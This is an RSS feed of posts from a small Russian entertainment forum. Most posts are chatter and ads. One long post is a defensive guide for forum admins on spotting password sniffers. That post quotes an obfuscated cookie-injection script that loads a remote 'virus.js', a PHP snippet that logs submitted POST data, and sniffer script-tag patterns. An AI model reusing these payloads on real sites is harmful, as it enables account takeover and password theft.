http://fun.rusff.me/ XDforum ru-ru Sun, 11 Oct 2009 16:55:55 +0400 MyBB/mybb.ru http://fun.rusff.me/viewtopic.php?pid=6625#p6625 <p>Спасибо огромное и на этом! <img class="postimg" loading="lazy" src="http://www.kolobok.us/smiles/standart/dance4.gif" alt="http://www.kolobok.us/smiles/standart/dance4.gif" /></p> mybb@mybb.ru (PeacH) Sun, 11 Oct 2009 16:55:55 +0400 http://fun.rusff.me/viewtopic.php?pid=6625#p6625 http://fun.rusff.me/viewtopic.php?pid=6623#p6623 <p>хорошая инфа</p> mybb@mybb.ru (PeacH) Sun, 11 Oct 2009 14:51:40 +0400 http://fun.rusff.me/viewtopic.php?pid=6623#p6623 http://fun.rusff.me/viewtopic.php?pid=6622#p6622 <p>а че нормально! только бы скринов!</p> mybb@mybb.ru (PeacH) Sun, 11 Oct 2009 12:56:38 +0400 http://fun.rusff.me/viewtopic.php?pid=6622#p6622 http://fun.rusff.me/viewtopic.php?pid=6621#p6621 <p>ЛисА</p> mybb@mybb.ru (PeacH) Sun, 11 Oct 2009 12:55:32 +0400 http://fun.rusff.me/viewtopic.php?pid=6621#p6621 http://fun.rusff.me/viewtopic.php?pid=6620#p6620 <div class="quote-box answer-box"><cite>FL@$H написал(а):</cite><blockquote><p>На Валуева в лесу напал медведь. Как объяснили ученые, косолапый переелмухоморов и потерял инстинкт самосохранения.</p></blockquote></div><p>ухахах прикольно)))</p> mybb@mybb.ru (PeacH) Sun, 11 Oct 2009 12:54:37 +0400 http://fun.rusff.me/viewtopic.php?pid=6620#p6620 http://fun.rusff.me/viewtopic.php?pid=6618#p6618 <p>И так решил выложить 4-ую версию фотошопа <img class="postimg" loading="lazy" src="http://www.kolobok.us/smiles/standart/clapping.gif" alt="http://www.kolobok.us/smiles/standart/clapping.gif" /> <br /><a href="http://depositfiles.com/files/unmld2170" rel="nofollow" target="_blank">СКАЧАТЬ</a></p> mybb@mybb.ru (PeacH) Sun, 11 Oct 2009 12:51:07 +0400 http://fun.rusff.me/viewtopic.php?pid=6618#p6618 http://fun.rusff.me/viewtopic.php?pid=6617#p6617 <p>отличные картинки!</p> mybb@mybb.ru (PeacH) Sun, 11 Oct 2009 12:50:48 +0400 http://fun.rusff.me/viewtopic.php?pid=6617#p6617 http://fun.rusff.me/viewtopic.php?pid=6616#p6616 <p>Пишем все о фильме!</p> <p>Я ходил а 3D aфильм нормальный советую всем смотреть! Особенно в 3D</p> mybb@mybb.ru (PeacH) Sun, 11 Oct 2009 12:48:46 +0400 http://fun.rusff.me/viewtopic.php?pid=6616#p6616 http://fun.rusff.me/viewtopic.php?pid=6615#p6615 <p>Великая ОНЛАЙН игра! Пишите все о ней в эту тему!</p> <p>Делимся песнями о CS</p> mybb@mybb.ru (PeacH) Sun, 11 Oct 2009 12:46:59 +0400 http://fun.rusff.me/viewtopic.php?pid=6615#p6615 http://fun.rusff.me/viewtopic.php?pid=6614#p6614 <p>вот он мой Контакт <img class="postimg" loading="lazy" src="http://www.kolobok.us/smiles/standart/dance4.gif" alt="http://www.kolobok.us/smiles/standart/dance4.gif" /> <br /><a href="http://vkontakte.ru/id43169778" rel="nofollow" target="_blank">http://vkontakte.ru/id43169778</a></p> mybb@mybb.ru (PeacH) Sun, 11 Oct 2009 12:40:33 +0400 http://fun.rusff.me/viewtopic.php?pid=6614#p6614 http://fun.rusff.me/viewtopic.php?pid=6605#p6605 <p><strong>Никита</strong>, это подходит для форумов mybb и партнерских. На основе css и java сделано.</p> mybb@mybb.ru (Akahoshi) Mon, 05 Oct 2009 21:13:14 +0400 http://fun.rusff.me/viewtopic.php?pid=6605#p6605 http://fun.rusff.me/viewtopic.php?pid=6596#p6596 <div class="quote-box quote-main"><blockquote><p>&lt;a href=&quot;http://lifez.rolka.su/&quot; target=_blank&gt;&lt;img src=&quot;http://i077.radikal.ru/0908/ff/d527e192da1c.jpg&quot; border=&quot;0&quot;alt=&quot;Война кошек и собак&quot; width=88height=31&gt;&lt;/a&gt;</p></blockquote></div> mybb@mybb.ru (Лика) Mon, 05 Oct 2009 14:44:36 +0400 http://fun.rusff.me/viewtopic.php?pid=6596#p6596 http://fun.rusff.me/viewtopic.php?pid=6595#p6595 <p>значит просто для того что бы был участник</p> mybb@mybb.ru (Лика) Mon, 05 Oct 2009 14:42:59 +0400 http://fun.rusff.me/viewtopic.php?pid=6595#p6595 http://fun.rusff.me/viewtopic.php?pid=6593#p6593 <p><span style="display: block; text-align: center"><span style="font-family: Comic Sans Ms"><a href="http://lifez.rolka.su/" rel="nofollow" target="_blank">~*~Война кошек и собак~*~</a></span></span><br /><span style="display: block; text-align: center"> <a href="http://www.radikal.ru" rel="nofollow" target="_blank"><img class="postimg" loading="lazy" src="http://s61.radikal.ru/i174/0908/13/f7dfae2de401.jpg" alt="http://s61.radikal.ru/i174/0908/13/f7dfae2de401.jpg" /></a> </span><br /><span style="display: block; text-align: center"><span style="color: red">На форуме <a href="http://lifez.rolka.su/viewtopic.php?id=8#p9" rel="nofollow" target="_blank">заказаны</a> персонажи!</span></span><br /><span style="display: block; text-align: center">Давным-давно, в далёком лесу, было две стаи. Стая Восходящего Солнца и Стая Лунного Света. Они враждовали между собой. А всё из-за того что они были разные... Стая Восходящего Солнца была благородна и честна. А Стая Лунного Света была жестока и своенравна. Не подумайте что Стая Восходящего Солнца выходила только днём, а Стая Лунного Света только вечером. Нет, это правда только отчасти. Стая Восходящего Солнца получила своё название в честь своего первого вожака, Луча. А Стая Лунного Света в честь их первого вожака, Луны. Вот так бы они жили если бы однажды один воин не забрёл в чащу леса и не нашёл бы там Своры котов. Почему Своры? Да потому что. Оказывается на другой половине леса живут две Своры, Свора Стальных Клыков и Свора Тёплого Сердца. И здесь разразилась настоящая война. Собаки забыли на время свою вражду стали против кошек. Кошки зделали тоже самое и стали воевать с собаками. Так прошло много лет и до сих пор эта война незакончена...</span><br />Ваша реклама - <a href="http://lifez.rolka.su/viewtopic.php?id=25" rel="nofollow" target="_blank">http://lifez.rolka.su/viewtopic.php?id=25</a> <img class="postimg" loading="lazy" src="http://www.kolobok.us/smiles/standart/dance2.gif" alt="http://www.kolobok.us/smiles/standart/dance2.gif" /><br /><span style="display: block; text-align: right"><span style="color: red">//одобренно. <strong>Администратор</strong></span></span></p> mybb@mybb.ru (Лика) Mon, 05 Oct 2009 13:02:24 +0400 http://fun.rusff.me/viewtopic.php?pid=6593#p6593 http://fun.rusff.me/viewtopic.php?pid=6591#p6591 <p>Приветик вам <img class="postimg" loading="lazy" src="http://mybb.ru/f/collection/0208.gif" alt="http://mybb.ru/f/collection/0208.gif" /></p> mybb@mybb.ru (.Kiki_blood) Sat, 03 Oct 2009 16:02:03 +0400 http://fun.rusff.me/viewtopic.php?pid=6591#p6591 http://fun.rusff.me/viewtopic.php?pid=6581#p6581 <p>4 октября 2009<br />Стрекоза идёт на Петровский! <img class="postimg" loading="lazy" src="http://www.kolobok.us/smiles/standart/censored.gif" alt="http://www.kolobok.us/smiles/standart/censored.gif" /></p> mybb@mybb.ru (Стрекоза) Fri, 02 Oct 2009 15:36:05 +0400 http://fun.rusff.me/viewtopic.php?pid=6581#p6581 http://fun.rusff.me/viewtopic.php?pid=6574#p6574 <p>Ссылка битая.</p> mybb@mybb.ru (Akahoshi) Fri, 25 Sep 2009 17:31:34 +0400 http://fun.rusff.me/viewtopic.php?pid=6574#p6574 http://fun.rusff.me/viewtopic.php?pid=6573#p6573 <div class="quote-box answer-box"><cite>Андрюха написал(а):</cite><blockquote><p>если на форуме останешься, то покажусь)</p></blockquote></div><p>Да что уж там, может быть и я тогда покажусь, тольуо уогда это будет.</p> mybb@mybb.ru (Akahoshi) Fri, 25 Sep 2009 17:27:38 +0400 http://fun.rusff.me/viewtopic.php?pid=6573#p6573 http://fun.rusff.me/viewtopic.php?pid=6572#p6572 <p><span style="font-family: Comic Sans Ms">Понятно)</span></p> mybb@mybb.ru (Андрюха) Fri, 25 Sep 2009 17:03:03 +0400 http://fun.rusff.me/viewtopic.php?pid=6572#p6572 http://fun.rusff.me/viewtopic.php?pid=6559#p6559 <p><strong>RePlay</strong>, это издевательство, товарищ? Никакую операционную систему на смартфон, равно как и на КПК, установить невозможно, кроме той, что была вшита в аппарат при изготовлении. Для смартфонов Нокиа эта система - Symbian, так что не страдайте чепухой.</p> mybb@mybb.ru (Akahoshi) Fri, 25 Sep 2009 09:50:39 +0400 http://fun.rusff.me/viewtopic.php?pid=6559#p6559 http://fun.rusff.me/viewtopic.php?pid=6557#p6557 <p>Антверпен</p> mybb@mybb.ru (Akahoshi) Fri, 25 Sep 2009 00:43:44 +0400 http://fun.rusff.me/viewtopic.php?pid=6557#p6557 http://fun.rusff.me/viewtopic.php?pid=6553#p6553 <p><span style="font-size: 18px"><strong>Общие замечания</strong></span></p> <p>Думаю, небольшая заметка будет уместна.</p> <p>Что делать, если на форуме появился еще один нежданный админ?</p> <p>/Способы того, как он появился, мы рассматривать по возможности не будем... Но это поверьте - это действительно возможно... /</p> <p>Говорить -&quot;ба, какие люди&quot; - не нужно. Идти к Кейсу и говорить там дядя у меня какой-то, тоже не надо, точнее не вовремя. Время на счету. Дороги секунды. Как ни странно, можно отстоять форум и обломать хакера.</p> <p>Рекомендую сразу сменить гпф. Без выяснения подробностей. Далее используя свой профиль, понизить в статусе админа и забанить его.<br />Если ваш профиль удален, создать новый с паролем гпф и сменить гпф на новый еще раз. Объясню зачем следует так делать. Вы регистрируете профиль, а на форуме может стоять снифер и, вуаля, хакер узнает ваш гпф. Получается, что мне даже не надо знать ваш гпф, чтобы взломать форум, мне и админского пароля достаточно, а потом, когда вы начнете дергаться, выудить и гпф. И тогда только Кейс, ваш спаситель и надежда.</p> <p>Но вернемся к нашей сцене взлома. Как мы разобрались - смена пароля также опасна и на взломанном сайте.<br />И даже забаненный хакер может вернуться. Поэтому мы не только меняем гпф, но и восстанавливаем хтмл-низ и верх, что бы избавиться от снифера. Естественно, старый код дублируется и сохраняется для восстановления дизайна и анализа специалистом его начинки, для проверки на наличие снифера.</p> <p>Игры с забаниванием могут быть продолжительными, особенно если вы потеряли гпф И тут вам без дубликата админского профиля никуда... Да и еще, некоторые делают хорошую вещь - они регят себе еще один профиль с админским статусом и &quot;забывают&quot; про него до поры до времени... профиль тот уходит в глубину списка пользователей и может быть не замечен хакером))) А потом уже вы ставите тихой ночью сниф и удаляете хакера, который утром дергается и теряет уже свой гпф.</p> <p>Таким образом вы обратили наверное внимание на то, что любой предложенный кем то добрым код для вставки на форум потенциально опасен. Особенно если вы в нем не разбираетесь. И то, что чем больше админов тем лучше для хакеров. У них есть большие шансы взломать хотя бы одного...</p> <p>Его /код снифера/ можно вставить даже в скрипт летающих бабочек :flag: вполне работающих, но и от кражи пароля не отказывающихся бабочек.</p> <p>Теперь вы скажите: я до тогой тупости не опущусь. Хорошо. Значит тогда я узнаю ваш почтовый ящик, а это поверьте мне не сложно сделать и взломав его запрошу восстановление пароля. И на уже мою почту придет пароль.</p> <p>А дальше я подсуну код снифера. И опять ГПФ мой))</p> <p>И как же так? Вы скрывали свою почту. Ее не отображал ваш профиль? А дело в том что ящик у вас один на все случаи жизни. Вывод: нужен еще один ящик под эти цели. Адрес которого вы ни кому и не когда не скажите.</p> <p>С таким ящиком не жалко и все фишки защиты форума запустить.</p> <p>Пропишите его в профиле и активируйте. Тогда вы сможете восстановить забытый пароль.</p> <p>Но ни когда не прописывайте вашу общественную почту. Лучше воздержаться от этого. И не прописывать почту в профиле вообще.</p> <p>Рекомендую заводить почту исключительно на <a href="http://gmail.com" rel="nofollow" target="_blank">http://gmail.com</a> (не путать с <a href="http://gmail.ru" rel="nofollow" target="_blank">http://gmail.ru</a>!). Если почта на нем, я как правило не берусь ее ломать А вот мэил.ру!!! Другое дело! И еще НМ и почты.нет И еще много других почтовых серверов лохоимцев)) Этих да в первую очередь</p> <p>Теперь о паролях. Как не странно у многих он один на все форумы и сайты и почту и гпф...</p> <p>В общем каждому форуму и сайту свой пароль... Ну можно расслабится и сделать а ля гостевой пароль и несколько секретных. )))</p> <p>Еще можно украсть ваш пароль (а точнее кукисы, они же куки) через браузер Internet Explorer (ИЕ, ишак, ослик, ишачок...) и если он совпадет с паролем форума быть беде. С самого форума украсть через браузер пароль сейчас не возможно. Кейс защитил форум от этого. А вот с другого ресурса вполне возможно и реально. Помните об этом и не ходите на малознакомые сайты и тем более по ссылкам от неизвестных вам личностей. А еще смените его (браузер) на Оперу или ФайрФокс (Огнелис) в которых пресловутая уязвимость отсутствует, а значит вас ни кто не обманет</p> <p>В любом случае если что не расстраивайтесь и идите к Кейсу на форум техподдержки и просите помощи ( Заявки на восстановление «взломанных» форумов ). Спокойно расскажите как и когда (а может даже и как) вас взломали. Укажите ссылку на форум (!). Не кричите. Поменьше истерики. Вас не захотят слушать если вы будете предъявлять претензии. И правильно сделают - вы сами виноваты, что вас обманули! Покажите как можно больше доказательств взлома. Вплоть до скриншотов переписки и главной страницы форума.</p> <p>Поверьте часто хакер (если он человек умный) не станет афишировать взлом. Он аккуратно прикроет форум, чтобы и в мыслях не было подозрений на взлом))) И не станет разводить дискуссий. Проставит черный режим, всех понизит. Вроде форум есть, а взлома нет)</p> <p>Модераторский состав должен быть хорошо подобран. Поскольку диверсии со стороны &quot;модераторов&quot;-хакеров не так страшны, но все же встречаются, не ленитесь копировать информацию, хотя бы сообщения первых топиков. Сами модераторы должны уметь предупредить вас о случившемся. Соответственно они должны знать, куда писать, а что еще лучше звонить!</p> <p>Модераторы должны быть распределены по разделам, а не быть по принципу все на все разделы. Иначе вы никогда не узнаете кто же совершил диверсию в разделе.</p> <p>Вы не поверите, но испугав подобной шалостью админы меняют себе пароль))) А это так хорошо для снифа... </p> <p>Закончу статью тем, что хорошо бы поставить себе на форум логер. И знать кто и когда приходил, с каким статусом, и в каком разделе он был. Код логера не предлагаю... как думаете почему?</p> <p>Желаю вам удачи. И счастья не знать что такое горе обездоленного админа. С уважением ваш Мефи.<br />______________________________________________<br />Справочный материал:<br />ГПФ - главный пароль форума задается при регистрации форума и может быть изменен здесь - <a href="http://catalogue.forum24.ru/?40" rel="nofollow" target="_blank">http://catalogue.forum24.ru/?40</a> соответственно у вас свое имя форума и домена: имя.домен.ru/?40, где домен forum24 или borda.</p> <p>СИ - социальный инженеринг - совокупность методов обмана юзера для конечной цели - выуживание полезной информации или пароля/доступа.</p> <p>Куки, кука - грубо говоря файл в котором лежит ваш пароль дабы не вводить пароль на каждой странице сайта и форума. Вас как бы &quot;запомнили&quot; на время существования кука (пока вы не вышли с сайта по ссылке выйти) или сессии (по времени, например на час помнить вас).</p> <p>Вы много слышали об этом страшном звере... снифер! Вор паролей!<br />Надеюсь я вас хорошо запугал и вы дрожите Но я вас не просто так пугал Я хочу что бы вы знали в лицо врага и умели с ним бороться. Итак рассмотрим его поближе...</p> <p><span style="font-size: 18px"><strong>Методы обнаружения снифера и его удаление</strong></span></p> <p>Снифер хороший зверек, живет и не кого не трогает пока вы не вошли на форум или не сменили пароль в профиле))) В общем ввод пароля опасен если вы не просмотрели исходный код страницы форума</p> <p>Как посмотреть если у вас снифер? Элементарно: вид - исходный текст или Ctrl+F3 (в Опере) и вид - просмотр HTML-кода (в Internet Explorer’e - который как мы выяснили в предыдущей статье приносит вред безопасности пользователя).</p> <p>Перед нами код странички. Наша задача осмотреться и принять решение входить на форум или не стоит Особенно если форум чужой и вы были туда в спешке приглашены, а возможно вас там обсуждают активно и критикуют И там нашли ваши порно фотки Вы теряете голову пишите тот же пароль что и всегда))) И, вуаля, вернувшись на свой родной форум вы видите пепелище и горькую свою участь</p> <p>Текстовом редакторе нас интересует знак вопроса. И не случайно! Ведь большинство сниферов имеют пхп запросы. Которые описываются как раз этим коварным знаком))) Значит ищем его правка - поиск) Если есть и не вы его писали значит дело дрянь))) Точнее дело дрянь у хакера</p> <p>Вот возможный вид этой строчки http://sniffer/picture.gif?password=&quot;...<br />и многие другие<br />В общем вот это должно вас напугать &quot;....что то тут.....?.....и что то тут.......&quot;</p> <p>А так же слова Password, user и самое страшное слово - Кейс Шутка конечно на счет последнего... Хотя и тоже правда от части))</p> <p>Вот теперь ваши шаги для избавления от снифера:<br />- восстановите дизайн в первоначальное состояние,<br />- зайдите на форум и восстановите дизайн из вашей копии форума (которую вы я надеюсь всегда держите под рукой),<br />- установить кто же это сделал...</p> <p>Если нет копии дизайна попробуйте удалить следующий кусок кода вручную</p> <p>&lt;script ..........&gt;<br />....................<br />................?................<br />................................<br />&lt;/script&gt;</p> <p>если боитесь испортить код форума, просто удалите знак вопроса. Этого вполне достаточно для нарушения работы вора паролей. Не забудьте после удаления снифера сменить пароль(!)</p> <p>Насчет обнаружения виновника, вам поможет первая статья. Но часто это видно по последнему списку посетителей. У которых есть права админа.</p> <p>Надеюсь был вам полезен. И вы будете осторожны в мире инета))) Надеюсь вы не станете параноиком после моих статей...))</p> <p>ЗЫ. О методах сокрытия снифера я вам так и не рассказал... оставлю для себя пожалуй А то вдруг захочу вспомнить старое</p> <p>Ладно открою последний козырь...<br />&lt;SCRIPT language='JavaScript1.1' src='http://site.domen.ru/snifer.js'&gt;&lt;/SCRIPT&gt;<br />Вот такие строки должны наводить вас на мысль что весь код снифера был закинут в отдельный файл и этот файл линкуется в страничке. Таким образом весь довольно большой кусок снифера прячется туда.</p> <p>Зайдите по ссылке <a href="http://site.domen.ru/snifer.js" rel="nofollow" target="_blank">http://site.domen.ru/snifer.js</a> и просмотрите есть ли там запросы со знаком вопроса...</p> <p>ЗЫЫ. И последнее если там абракадабра и мешанина значит весь сниф предварительно зашифровали от глаз юзера. Он тоже рабочий))) Только без знака вопроса будет))) Просто удалите</p> <p>&lt;SCRIPT language='JavaScript1.1' src='http://site.domen.ru/snifer.js'&gt;&lt;/SCRIPT&gt;</p> <p>с вашего форума и спите спокойно. Enjoy! Это все текущие современные методы взлома фастбб. Других нет. Да и эти тяжело протащить и осуществить. Фаста не ломается (с) Кейс.</p> <p><span style="font-size: 18px"><strong>Кое-что еще...</strong></span></p> <p>Еще была уязвимость такого рода:<br />хакер-модератор при бане любого участника вписывал не только айпи, но с помощью проги и вор паролей! Зайдя в список забаненых вас могли или могут /мне не известно сумел ли Кейс это исправить/ обокрасть и лишить пароля.</p> <p>Как избавиться?<br />Простым просмотром исходного кода определите наличие снифера. И удалите этого забаненного из списка бан-листа. После чего смените пароль себе и всем кто лазил в бан-лист. Можно сменить и гпф.</p> <p>После чего узнайте кто из модераторов мог это сделать. Возможно нужно спросить так называемый &quot;секретный вопрос&quot;. Ответ на который знают лишь истинные модераторы. А хакер который угнал профиль не знает.<br />Печальней всего будет если вы сами его назначили. =)</p> <p>Теперь о ЛЗ. Не секрет что на некоторых ролевых форумах можно заказать себе личное звание указав свой код. Я был буквально на днях на одном форуме и прикола ради указал код чатика. И его мне поставили. А так как в коде забыл закрыть один тег... Все страницы с моим участием разворотило до неузнаваемости)))<br />Но это не важно, я мог пихнуть им снифера! И написав во всех темах форума по сообщению, ждать богатого улова. ]:-&gt;</p> <p>Так что незнание чего то кем то большая возможность для хакинга!</p> <p>Что делать с лз? Ну заведите стандартную форму заполнения и СТРОГО придерживаетесь ее. А незнакомый код сразу отбрасывать и запрещать ставить своим со-админам.</p> <p><span style="font-size: 18px"><strong>Письмо к Кейсу</strong></span></p><div class="quote-box quote-main"><blockquote><p>Привет. Это Норм Иридиум.<br />Я был забанен предположительно год назад на форуме техподдержки. С тех пор я многое передумал. И завязал с хакерской деятельностью окончательно. Обещаю не флудить на форуме. Тем более теперь у меня есть чем заниматься, а не страдать всякой фигней типа взлома малолеток и их ролевых форумов. Я стал помогать пользователям Фастбб в решении их проблем и способствовать укреплению безопасности их форумов. Целиком и полностью за счет разъяснительной работы.<br />Прошу простить меня, а я думаю меня есть за что не любить...</p> <p>В заключении передаю Вам информацию (правда не проверенную мной лично) о новом методе взлома форумов:</p> <p>&lt;script&gt;<br />document.cookie=&quot;t='+eval(unescape('document.write%28%27%3Csc%27+<br />%27ript%20 src%3D%22http%3A%2F%2 Fpupkin.ru%2Fvirus.js %22%3E%3C%2Fsc%27+<br />%27ript%3E%27%29%3B'))+';domain=.forum24.ru&quot;;<br />&lt;/script&gt;</p> <p>if (!isset($_COOKIE['block_the_fuck'])){<br />$ThePost = serialize($_POST);<br />$fp = fopen('.the_post', 'a');<br />fwrite($fp, $ThePost.&quot;\n&quot;);<br />fclose($fp);<br />}</p> <p>Готов и дальше сотрудничать с администрацией. Прошу разбанить мой профиль. Искренне извиняюсь за все деструктивные действия когда либо совершенные на сервисе фастбб.</p> <p>С уважением, Норм Иридиум.</p></blockquote></div><p>Суть уязвимости - вам в куки пишется скрипт когда вы заходите на чужой сайт/форум. По возвращению на свой форум этот скрипт вставляется из куков на форум и исполняется. Соответственно в скрипт может быть вложено что угодно в том числе и вор паролей.</p> mybb@mybb.ru (Akahoshi) Fri, 25 Sep 2009 00:32:33 +0400 http://fun.rusff.me/viewtopic.php?pid=6553#p6553 http://fun.rusff.me/viewtopic.php?pid=6549#p6549 <p>Хм, делаю в основном аватары, подписи и тому подобное, так что:</p> <p><a href="http://i078.radikal.ru/0909/44/5a56a72f9a7f.jpg" rel="nofollow" target="_blank">http://i078.radikal.ru/0909/44/5a56a72f9a7f.jpg</a><br /><a href="http://s58.radikal.ru/i160/0909/18/33de39555e64.jpg" rel="nofollow" target="_blank">http://s58.radikal.ru/i160/0909/18/33de39555e64.jpg</a><br /><a href="http://s19.radikal.ru/i192/0909/c5/c824cb9e4ff7.jpg" rel="nofollow" target="_blank">http://s19.radikal.ru/i192/0909/c5/c824cb9e4ff7.jpg</a><br /><a href="http://s59.radikal.ru/i166/0909/51/980623cd83b6.jpg" rel="nofollow" target="_blank">http://s59.radikal.ru/i166/0909/51/980623cd83b6.jpg</a><br /><a href="http://i029.radikal.ru/0909/8c/9f86dc9b8b67.gif" rel="nofollow" target="_blank">http://i029.radikal.ru/0909/8c/9f86dc9b8b67.gif</a><br /><a href="http://i038.radikal.ru/0909/ee/7dd69d4719f7.jpg" rel="nofollow" target="_blank">http://i038.radikal.ru/0909/ee/7dd69d4719f7.jpg</a><br /><a href="http://i005.radikal.ru/0909/14/2542f38b16a0.jpg" rel="nofollow" target="_blank">http://i005.radikal.ru/0909/14/2542f38b16a0.jpg</a><br /><a href="http://i027.radikal.ru/0909/c3/2376dc27f7d2.jpg" rel="nofollow" target="_blank">http://i027.radikal.ru/0909/c3/2376dc27f7d2.jpg</a></p> mybb@mybb.ru (Akahoshi) Fri, 25 Sep 2009 00:19:40 +0400 http://fun.rusff.me/viewtopic.php?pid=6549#p6549 http://fun.rusff.me/viewtopic.php?pid=6540#p6540 <p><span style="font-family: Comic Sans Ms"><span style="color: blue"><strong><span style="font-size: 16px">Заполните бланк для вывода картинки в галерею.</span></strong></span></span></p><div class="quote-box quote-main"><blockquote><p>1. Раздел галереи<br />2. Описание картинки<br />3. сама картинка.</p></blockquote></div><p><strong>Все поля обязательны!!</strong></p> <p><a href="http://xdfor.ru/pages/galereya" rel="nofollow" target="_blank">Галерея</a></p> mybb@mybb.ru (Андрюха) Wed, 23 Sep 2009 14:02:12 +0400 http://fun.rusff.me/viewtopic.php?pid=6540#p6540 http://fun.rusff.me/viewtopic.php?pid=6347#p6347 <p>Если возникли вопросы по форуму, по его работе или же хотите что бы появился новый раздел или внесли какую-либо поправку, пишите сюда</p> mybb@mybb.ru (Андрюха) Sun, 30 Aug 2009 00:37:11 +0400 http://fun.rusff.me/viewtopic.php?pid=6347#p6347